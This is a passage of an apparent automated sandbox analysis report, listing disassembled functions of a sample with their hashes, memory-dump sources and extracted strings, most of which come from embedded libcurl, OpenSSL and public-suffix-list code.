                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$`J{$`J{$bJ{$bJ{$bJ{$file$file://%s%s%s$https$urlapi.c$vJ{$vJ{$xn--
                                          • API String ID: 0-741775103
                                          • Opcode ID: ca77884964b1bd0aa9e99605879e5328c88bb78ce6559f361b93fd385f6c190e
                                          • Instruction ID: a9c6b9d0021f2bd33998cecae05601df3f9f0a1a289bcd0b360021b7111f8718
                                          • Opcode Fuzzy Hash: ca77884964b1bd0aa9e99605879e5328c88bb78ce6559f361b93fd385f6c190e
                                          • Instruction Fuzzy Hash: 9B724B30608F819FE7258A1AC9467ABB7D3AF91348F05862CEDC55B293E776DC84C781
                                          Function 001D4940 Relevance: 17.0, Strings: 13, Instructions: 731COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                          • API String ID: 0-122532811
                                          • Opcode ID: cae3e90d83cba98811c2b37c625861f028138c1c80f6ac3d55577f1789f490d6
                                          • Instruction ID: 24d86d8dd64df3b8d5da0b2d1e08f6ce4e4f3e85e2a1fafe7573412f52c96027
                                          • Opcode Fuzzy Hash: cae3e90d83cba98811c2b37c625861f028138c1c80f6ac3d55577f1789f490d6
                                          • Instruction Fuzzy Hash: A042F6B1B08700AFD708DE28CC41BABB6E6EBD4704F048A2DF55D97391E775AD148B92
                                          Function 00279880 Relevance: 12.7, Strings: 10, Instructions: 226COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ans$attempts$ndot$out$retr$retr$rota$time$use-$usev
                                          • API String ID: 0-359024792
                                          • Opcode ID: 4fcadf09eee452307b9fd53327bdd7de08f1de3dc5fe55d8375b6a9434ed7507
                                          • Instruction ID: 0474afac839a0a16ab960e5fae2eaa6b036beca57df20e49fbf3ad270489c008
                                          • Opcode Fuzzy Hash: 4fcadf09eee452307b9fd53327bdd7de08f1de3dc5fe55d8375b6a9434ed7507
                                          • Instruction Fuzzy Hash: 9F61F8A5A2830167EB14AA20AC46B3B7699AB95308F04C43DFC4E96392FA71DD64C753
                                          Function 00380D80 Relevance: 9.5, Strings: 7, Instructions: 705COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: !$EVP_DecryptFinal_ex$EVP_DecryptUpdate$EVP_EncryptFinal_ex$assertion failed: b <= sizeof(ctx->buf)$assertion failed: b <= sizeof(ctx->final)$crypto/evp/evp_enc.c
                                          • API String ID: 0-2550110336
                                          • Opcode ID: 03d5cca51c6f0e5f208b2b91064ba0dc2d0c397c7239ffed145e396b1d47f019
                                          • Instruction ID: deba961b745ae81aee929f887905316fa8d6409182f166e135429a588732b35e
                                          • Opcode Fuzzy Hash: 03d5cca51c6f0e5f208b2b91064ba0dc2d0c397c7239ffed145e396b1d47f019
                                          • Instruction Fuzzy Hash: 9D327D70748304BBD7367A209C42F3A7799FF50704F148998F9999A2C2EBB8E995C742
                                          Function 0028EF90 Relevance: 9.4, Strings: 7, Instructions: 688COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $.$;$?$?$xn--$xn--
                                          • API String ID: 0-543057197
                                          • Opcode ID: ca5798f7d0a68b9ed2c91e52eb97a55e9ab7bd47f91a00544008c0cf5547cbb0
                                          • Instruction ID: 9a74ba70f796f746ecb0bec52485d514f8d93020f87392736497e9757f5c6d2e
                                          • Opcode Fuzzy Hash: ca5798f7d0a68b9ed2c91e52eb97a55e9ab7bd47f91a00544008c0cf5547cbb0
                                          • Instruction Fuzzy Hash: 2122377AA263069FEB50AE24DD81B6B77E4AF94308F04453CF859932D2F770D924CB52
                                          Function 00288F90 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 256COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: FreeTable
                                          • String ID: 127.0.0.1$::1$TRSKE
                                          • API String ID: 3582546490-434011787
                                          • Opcode ID: bfb9f78ba871207c5564ac40e4dc53719b93ee37c2a46ff331fa9b29f1a0ab6a
                                          • Instruction ID: eaae05f178553ac16ecf7706ad3702918771aa522690582362b08fdf5421568a
                                          • Opcode Fuzzy Hash: bfb9f78ba871207c5564ac40e4dc53719b93ee37c2a46ff331fa9b29f1a0ab6a
                                          • Instruction Fuzzy Hash: B2A1B3B5D243429BE310EF24C845736B7E0BF95304F198629F8498B291F7B1E9E0D792
                                          Function 001CA960 Relevance: 9.0, Strings: 6, Instructions: 1491COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                          • API String ID: 0-2555271450
                                          • Opcode ID: b11368bffe64c5ceff9e9ccbb1756849ec0e5d15b8b37a585393bcee835f6363
                                          • Instruction ID: dafc3e7c0974021b8a48bf4e067e61cb685ef0162fb7398d1243e877f9f429b3
                                          • Opcode Fuzzy Hash: b11368bffe64c5ceff9e9ccbb1756849ec0e5d15b8b37a585393bcee835f6363
                                          • Instruction Fuzzy Hash: 66C27B716083458FC718CF28C4D1B6AB7E2AFE9314F158A2DE89ADB351D734ED458B82
                                          Function 001CE620 Relevance: 8.5, Strings: 6, Instructions: 1028COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                          • API String ID: 0-2555271450
                                          • Opcode ID: e7a9a6da660a4dae85150046a2aad6a3235108d187630a0df7fd35f165e9d5ee
                                          • Instruction ID: 792b71fbe14db28467084c8b504d1ba91b31e37944efe55950f1dfa9afe035be
                                          • Opcode Fuzzy Hash: e7a9a6da660a4dae85150046a2aad6a3235108d187630a0df7fd35f165e9d5ee
                                          • Instruction Fuzzy Hash: 7382A371A083419FD714CE18C885B6BBBE2EFE5724F198A2DF89997291D730DC06CB52
                                          Function 00226210 Relevance: 7.9, Strings: 6, Instructions: 419COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: default$login$macdef$machine$netrc.c$password
                                          • API String ID: 0-1043775505
                                          • Opcode ID: 271aba02c8d30738be8536a060ebd5b39c717bd0ad32e679810baa232d41ca84
                                          • Instruction ID: d384fbe142af219d39c9038786f50ace6b4e7de32bda8d9f2f65fb24c2804c86
                                          • Opcode Fuzzy Hash: 271aba02c8d30738be8536a060ebd5b39c717bd0ad32e679810baa232d41ca84
                                          • Instruction Fuzzy Hash: 95E15E725283A2BBD3209F94B84976BBBD4AF55708F14042CF8C557281E3F9DD68C792
                                          Function 0022A7F0 Relevance: 6.9, Strings: 5, Instructions: 687COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ????$Invalid input packet$SMB upload needs to know the size up front$\$\\
                                          • API String ID: 0-4201740241
                                          • Opcode ID: ae40ff67ecc38c2f00aa4110fce7855179716ea0b88cd6692943faf42677d51d
                                          • Instruction ID: e48119c34fff3fffb9d824e7bde8f6f12c1a237d49b3342bae94d9ff5f7069cd
                                          • Opcode Fuzzy Hash: ae40ff67ecc38c2f00aa4110fce7855179716ea0b88cd6692943faf42677d51d
                                          • Instruction Fuzzy Hash: 7162D3B0914742EBD715CF60C4907AAB7E4FF98304F04961DE88D8B352E774EAA4CB96
                                          Function 00543A70 Relevance: 6.8, Strings: 5, Instructions: 517COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .DAFSA@PSL_$===BEGIN ICANN DOMAINS===$===BEGIN PRIVATE DOMAINS===$===END ICANN DOMAINS===$===END PRIVATE DOMAINS===
                                          • API String ID: 0-2839762339
                                          • Opcode ID: 3ef079b4336ea145eb3aa9cb79a7093ba7b2268290c945f793689b339cc1702f
                                          • Instruction ID: 5e75a582df7072c2b2be434fbb2019e7d73bdc5e5bc90501387ef1208a5aa8b2
                                          • Opcode Fuzzy Hash: 3ef079b4336ea145eb3aa9cb79a7093ba7b2268290c945f793689b339cc1702f
                                          • Instruction Fuzzy Hash: D202D8B1A093419FD7259F24D8457EBBFE4FF94308F04482CE98987252EB71D914CB92
                                          Function 0027C900 Relevance: 5.4, Strings: 4, Instructions: 369COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
